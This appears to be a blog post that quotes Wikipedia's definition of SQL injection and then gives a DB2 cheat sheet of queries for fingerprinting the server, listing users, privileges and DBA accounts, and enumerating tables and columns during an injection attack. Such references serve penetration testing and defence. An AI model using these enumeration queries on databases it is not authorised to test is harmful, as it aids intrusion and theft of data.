SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).[1] SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vectorfor websites but can be used to attack any type of SQL database.
From Wiki - http://en.wikipedia.org/wiki/SQL_injection
From Wiki - http://en.wikipedia.org/wiki/SQL_injection
| Version | select versionnumber, version_timestamp from sysibm.sysversions; |
| Comments | select blah from foo; — comment like this |
| Current User | select user from sysibm.sysdummy1; select session_user from sysibm.sysdummy1; select system_user from sysibm.sysdummy1; |
| List Users | N/A (I think DB2 uses OS-level user accounts for authentication.)Database authorities (like roles, I think) can be listed like this: select grantee from syscat.dbauth; |
| List Password Hashes | N/A (I think DB2 uses OS-level user accounts for authentication.) |
| List Privileges | select * from syscat.tabauth; — privs on tables select * from syscat.dbauth where grantee = current user; select * from syscat.tabauth where grantee = current user; select * from SYSIBM.SYSUSERAUTH – List db2 system privilegies |
| List DBA Accounts | select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’ |
| Current Database | select current server from sysibm.sysdummy1; |
| List Databases | SELECT schemaname FROM syscat.schemata; |
| List Columns | select name, tbname, coltype from sysibm.syscolumns; |
| List Tables | select name from sysibm.systables; |
| Find Tables From Column Name | select tbname from sysibm.syscolumns where name=’username’ |
| Select Nth Row | select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only; |
| Select Nth Char | SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1; — returns b |
| Bitwise AND | This page seems to indicate that DB2 has no support for bitwise operators! |
| ASCII Value -> Char | select chr(65) from sysibm.sysdummy1; — returns ‘A’ |
| Char -> ASCII Value | select ascii(‘A’) from sysibm.sysdummy1; — returns 65 |
| Casting | SELECT cast(’123′ as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1; |
| String Concatenation | SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’ select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’ |
No comments:
Post a Comment